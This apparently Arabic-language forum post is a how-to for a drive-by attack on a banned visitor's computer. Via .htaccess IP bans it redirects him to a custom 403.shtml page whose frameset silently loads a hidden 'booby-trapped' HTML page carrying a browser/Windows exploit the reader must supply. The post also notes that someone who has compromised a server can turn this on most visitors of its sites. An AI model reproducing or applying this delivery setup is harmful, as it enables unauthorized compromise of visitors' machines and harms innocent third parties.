السلام عليكم ورحمة الله
طبعا عنوان الموضوع واضح جدا
مثال نشوف منتديات او عندنا هنا يجي واحد يحط باتش او يجلس يسب ومايحترم نفسه
وتبي تخترقه
من غير ماترسل له باتش او صفحه
الطريقه سهله جدأ ارسل لي واحد وقال لي ان فيه واحد يخترق منتداه كل شوي وهذا ماهو من منتداه يخترق يرفع شل ويخترق المنتديات الي على السيرفر وجنن الاخ ويكتب كلام وصخ ويحط صور اباحيه في الموقع فكرت في طريقه في حجبه عن الموقع وطلعت معاي فكره في اختراق جهازه طبعا الكثير يعرف ملف
.htaccess والفائده و منها حظر اي بي
طيب لما تحظر اي بي وش راح يصير في الي تحظره؟؟
راح تطلع له هذي الصفحه
403.shtml تقول له ان مالك صلاحيات الدخول
طيب الان فهمنا ان لما تحظر واحد تفتح له الصفحه
403.shtml
الحين لازم يكون عندك ثغره اكسبلور او اي ثغره في نظام الوندز وهي موجوده فقط البحث وراح تحصل كثير عاد انت وشطارتك المهم لازم يكون عندك صفحه
html ملغومه
طيب شلون نخلي يفتح له المنتدى بس ملغوم
هنا الحل طبعا الكود مشفر في المنتدى تحصل الكود في المرفق
كود PHP:
<html>
<head>
<**** **********="Content-Type" content="****/html; charset=******s-1256">
<**** name="GENERATOR" content="Microsoft FrontPage 4.0">
<**** name="ProgId" content="FrontPage.Editor.********">
<title>عالم المعرفة - Powered by vBulletin</title>
<script language="JavaScript" type="****/javascript">
<!--
******.status=" تم "
// -->
***********
</head>
<frameset frameborder="0" framespacing="0" border="0" rows="0,*">
<frame name="1" src="s.html" scrolling="none" noresize>
<frame name="1" src="http://www.alm3refh.com/vb" scrolling="auto" noresize>
</frameset>
</html>
<SCRIPT LANGUAGE="JavaScript">
***********
تنسخ هذا الكود وتبدل رابط المعرفه برابط منتداك او موقعك وتغير اسم المنتدى
وتحفظ الكود بهذا الاسم
403.shtml
وترفع الصفحه في موقعك على هذا المسار
public_html/403.shtml
وترفع صفحتك الملغومه بهذا الاسم
على هذا المسار
public_html/s.html
ونسوي للمزعج باند عن طريق ملف
.htaccess
بتحصله على هذا المسار
public_html/.htaccess
نفتح ملف
.htaccess
ونحط فيه هذا الكود
كود PHP:
<Files 403.shtml>
order allow,deny
allow from all
</Files>
deny from 127.0.0.0
ونغير الاي بي
127.0.0.0 الى اي بي المزعج
وتقدر تضيف اكثر من اي بي بهذي الطريقه
اضافة سطر ثاني
deny from 127.0.0.1
ولو انت مخترق موقع على سيرفر تقدر من خلال ملف
.htaccess
اختراق اغلب متصفحين المواقع الموجوده على السيرفر
بدل ماتضيف الاي بي كامل
تضيف فقط بداية انطاق
مثال
deny from 127.0
راح ينحظرون الاي بيات الي تبدا بـ
127,0
نكمل الطريقه
الان لما يدخل المزعج راح تفتح له الصفحه
403.shtml
الي حطينا فيها كود الصفحه راح يشتغل المنتدى
+ الصفحه المغومه
وبكذا يكون جاله الي يستحقه ههههه
خواني انا لم الشرح الطريقه علشان تستخدم لكل من هب ودب هناك خط احمر لكل انسان لازم مايتعداه مثل طفل يدخل بغرض اما يحط باتش يضر فيه اناس او يدخل علشان يوصخ المنتدى بكلامه الوصخ هنا يكون تعدى الخط الاحمر ولازم يتأدب مو معقوله لما واحد يزعل من واحد يروح يسويها فيه وتذكرو كما تدين تدان والله يبعدنا عن هذي الشرذمه من الاطفال
احب اوضح هنا نقطه مهمه جدأ
1 - الطريقه تسويها لما تكون واثق
100% ان الطفل مزال يتصفح المنتدى وهي سهله على المدير
2 - اذا كان فيه مشكله في السيرفر من الممكن ان يحظر بعض الاي بيات ويتحول الزائر الى صفحة
403.shtml ومو معقوله تغلط هذي الغلطه مع زوار موقعك
3 - حذف الصفحه
403.shtml بعد ما تتأكد ان الاخ تحول لها وتحذف محتوى ملف
.htaccess
عندك موقع وفيه واحد مطلع عيونك تعال اخترقه
